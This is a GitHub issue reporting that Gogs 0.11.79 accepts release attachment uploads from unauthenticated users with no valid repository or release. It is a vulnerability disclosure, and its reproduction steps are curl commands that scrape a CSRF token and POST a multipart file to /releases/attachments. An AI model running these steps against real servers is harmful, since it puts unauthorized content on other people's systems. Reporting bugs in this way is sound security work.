Upload Release Attachment without a valid repo/release/account #5599
Description
Describe the bug
It's possible to upload a release attachment file without having a valid repository/release and without a valid user account, even if DISABLE_REGISTRATION is set to true in the app.ini configuration file.
The bug/vulnerability is not present if REQUIRE_SIGNIN_VIEW is set to true since all the requests will reply with a 302 redirect to the login page.
To Reproduce
Steps to reproduce the behavior: Assuming that the server runs on http://127.0.0.1:3000
- From a linux/unix/windows-substrate terminal
- Type the following command
curl -s http://127.0.0.1:3000/ | grep csrf - Copy the csrf token from the command above
- Create a file with the following content named request.txt
--boundary
Content-Disposition: form-data; name="file"; filename="test.txt"
test_test
--boundary--
- Type the following command. NOTE: replace
<token>with the CSRF token from step 3.
curl -kis -X 'POST' -H 'X-Csrf-Token: <token>' -H 'Content-Type: multipart/form-data; boundary=boundary' -b 'lang=en-US; _csrf=<token>' --data-binary @request.txt 'http://127.0.0.1:3000/releases/attachments'
The command will make a multipart request to thereleases/attachmentsendpoint with the data from file request.txt from step 4 - The server will reply with an UUID for the attachment file, visit the page at
http://127.0.0.1:3000/attachments/<uuid>to see it
Expected behavior
The server should check when someone is uploading orphans attachment (attachments not bounded to a valid repository and release) and refuse to save files for invalid repositories/releases and for unauthenticated users
Additional context
- Gogs version (or commit ref): 0.11.79.1211
- Git version: 1.10.2
- Operating system: Ubuntu
- Database:
- PostgreSQL
- MySQL
- MSSQL
- SQLite
- Can you reproduce the bug at https://try.gogs.io:
- Yes
- No. Since REQUIRE_SIGNIN_VIEW is set to true, all the requests will reply with a 302 redirect to the login page.
- Log gist (usually found in
log/gogs.log):